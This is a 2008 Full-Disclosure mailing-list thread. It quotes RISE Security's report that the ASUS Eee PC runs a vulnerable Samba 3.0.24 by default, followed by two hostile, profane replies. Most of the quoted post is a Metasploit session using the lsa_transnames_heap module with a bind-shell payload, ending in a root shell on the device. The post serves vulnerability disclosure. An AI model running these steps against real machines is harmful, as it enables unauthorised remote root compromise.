It is a remote root exploit on a very popular piece of hardware, you don't think that is a big deal?
Who the fuck rattled your cage anyway? What did you ever contribute for us to all bow down to receive your piss stream? On Feb 8, 2008 2:38 PM, reepex <[EMAIL PROTECTED]> wrote: > So you ran metasploit and then made a blog post. Is this what 'security > research' is considered now? And why did you write this is such a media > hyped way? Trying to get some spotlight? > > > On Feb 8, 2008 10:47 AM, RISE Security <[EMAIL PROTECTED]> > wrote: > > > -----BEGIN PGP SIGNED MESSAGE----- > > Hash: SHA1 > > > > We recently acquired an ASUS Eee PC (if you want to know more about it, > > a lot of reviews are available on internet). The first thing we did when > > we put our hands at the ASUS Eee PC was to test its security. The ASUS > > Eee PC comes with a customized version of Xandros operating system > > installed, and some other bundled software like Mozilla Firefox, Pidgin, > > Skype and OpenOffice.org. > > > > Analysing the running processes of the ASUS Eee PC, the first thing that > > caught our attention was the running smbd process (the sshd daemon was > > started by us, and is not enabled by default). > > > > > > eeepc-rise:/root> ps -e > > PID TTY TIME CMD > > 1 ? 00:00:00 fastinit > > 2 ? 00:00:00 ksoftirqd/0 > > 3 ? 00:00:00 events/0 > > 4 ? 00:00:00 khelper > > 5 ? 00:00:00 kthread > > 25 ? 00:00:00 kblockd/0 > > 26 ? 00:00:00 kacpid > > 128 ? 00:00:00 ata/0 > > 129 ? 00:00:00 ata_aux > > 130 ? 00:00:00 kseriod > > 148 ? 00:00:00 pdflush > > 149 ? 00:00:00 pdflush > > 150 ? 00:00:00 kswapd0 > > 151 ? 00:00:00 aio/0 > > 152 ? 00:00:00 unionfs_siod/0 > > 778 ? 00:00:00 scsi_eh_0 > > 779 ? 00:00:00 scsi_eh_1 > > 799 ? 00:00:00 kpsmoused > > 819 ? 00:00:00 kjournald > > 855 ? 00:00:00 fastinit > > 857 ? 00:00:00 sh > > 858 ? 00:00:00 su > > 859 tty3 00:00:00 getty > > 862 ? 00:00:00 startx > > 880 ? 00:00:00 xinit > > 881 tty2 00:00:06 Xorg > > 890 ? 00:00:00 udevd > > 952 ? 00:00:00 ksuspend_usbd > > 953 ? 00:00:00 khubd > > 1002 ? 00:00:00 acpid > > 1027 ? 00:00:00 pciehpd_event > > 1055 ? 00:00:00 ifplugd > > 1101 ? 00:00:00 scsi_eh_2 > > 1102 ? 00:00:00 usb-storage > > 1151 ? 00:00:00 icewm > > 1185 ? 00:00:01 AsusLauncher > > 1186 ? 00:00:00 icewmtray > > 1188 ? 00:00:01 powermonitor > > 1190 ? 00:00:00 minimixer > > 1191 ? 00:00:00 networkmonitor > > 1192 ? 00:00:00 wapmonitor > > 1193 ? 00:00:00 x-session-manag > > 1195 ? 00:00:00 x-session-manag > > 1200 ? 00:00:00 x-session-manag > > 1201 ? 00:00:00 dispwatch > > 1217 ? 00:00:00 cupsd > > 1224 ? 00:00:00 usbstorageapple > > 1234 ? 00:00:00 kondemand/0 > > 1240 ? 00:00:00 portmap > > 1248 ? 00:00:00 keyboardstatus > > 1272 ? 00:00:00 memd > > 1279 ? 00:00:00 scim-helper-man > > 1280 ? 00:00:00 scim-panel-gtk > > 1282 ? 00:00:00 scim-launcher > > 1297 ? 00:00:00 netserv > > 1331 ? 00:00:00 asusosd > > 1476 ? 00:00:00 xandrosncs-agen > > 1775 ? 00:00:00 dhclient3 > > 2002 ? 00:00:00 nmbd > > 2004 ? 00:00:00 smbd > > 2005 ? 00:00:00 smbd > > 2322 ? 00:00:00 sshd > > 2345 ? 00:00:00 sshd > > 2356 pts/0 00:00:00 bash > > 2362 pts/0 00:00:00 ps > > eeepc-rise:/root> > > > > > > Retrieving the the smbd version, we discovered that it runs a vulnerable > > version of Samba (Samba lsa_io_trans_names Heap Overflow), which exploit > > we published earlier last year. > > > > > > eeepc-rise:/root> smbd --version > > Version 3.0.24 > > eeepc-rise:/root> > > > > > > With this information, we ran our exploit against the ASUS Eee PC using > > the Debian/Ubuntu target (Xandros is based on Corel Linux, which is > > Debian based). > > > > > > msf > use linux/samba/lsa_transnames_heap > > msf exploit(lsa_transnames_heap) > set RHOST 192.168.50.10 > > RHOST => 192.168.50.10 > > msf exploit(lsa_transnames_heap) > set PAYLOAD linux/x86/shell_bind_tcp > > PAYLOAD => linux/x86/shell_bind_tcp > > msf exploit(lsa_transnames_heap) > show targets > > > > Exploit targets: > > > > Id Name > > -- ---- > > 0 Linux vsyscall > > 1 Linux Heap Brute Force (Debian/Ubuntu) > > 2 Linux Heap Brute Force (Gentoo) > > 3 Linux Heap Brute Force (Mandriva) > > 4 Linux Heap Brute Force (RHEL/CentOS) > > 5 Linux Heap Brute Force (SUSE) > > 6 Linux Heap Brute Force (Slackware) > > 7 DEBUG > > > > > > msf exploit(lsa_transnames_heap) > set TARGET 1 > > TARGET => 1 > > msf exploit(lsa_transnames_heap) > exploit > > [*] Started bind handler > > [*] Creating nop sled.... > > ... > > [*] Trying to exploit Samba with address 0x08415000... > > [*] Connecting to the SMB service... > > [*] Binding to > > 12345778-1234-abcd-ef00-0123456789ab:[EMAIL > > PROTECTED]:192.168.50.10[\lsarpc] > > ... > > [*] Bound to > > 12345778-1234-abcd-ef00-0123456789ab:[EMAIL > > PROTECTED]:192.168.50.10[\lsarpc] > > ... > > [*] Calling the vulnerable function... > > [+] Server did not respond, this is expected > > [*] Command shell session 1 opened (192.168.50.201:33694 -> > > 192.168.50.10:4444) > > msf exploit(lsa_transnames_heap) > sessions -i 1 > > [*] Starting interaction with 1... > > > > uname -a > > Linux eeepc-rise 2.6.21.4-eeepc #21 Sat Oct 13 12:14:03 EDT 2007 i686 > > GNU/Linux > > id > > uid=0(root) gid=0(root) egid=65534(nogroup) groups=65534(nogroup) > > > > > > Easy to learn, Easy to work, Easy to root. > > > > > > The original blog post and more information can be found in our > > website at http://risesecurity.org/. > > > > Best regards, > > RISE Security > > -----BEGIN PGP SIGNATURE----- > > Version: GnuPG v1.2.6 (GNU/Linux) > > > > iD8DBQFHrIeHhFjK78TGSUERAvq7AJ9iz2sHD4/cQ0CdlCC1axNiVhwmJwCfddEd > > 6tg6XRBCWHfPWFrSdVKu5oA= > > =OFwe > > -----END PGP SIGNATURE----- > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- "If you see me laughing, you better have backups"
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/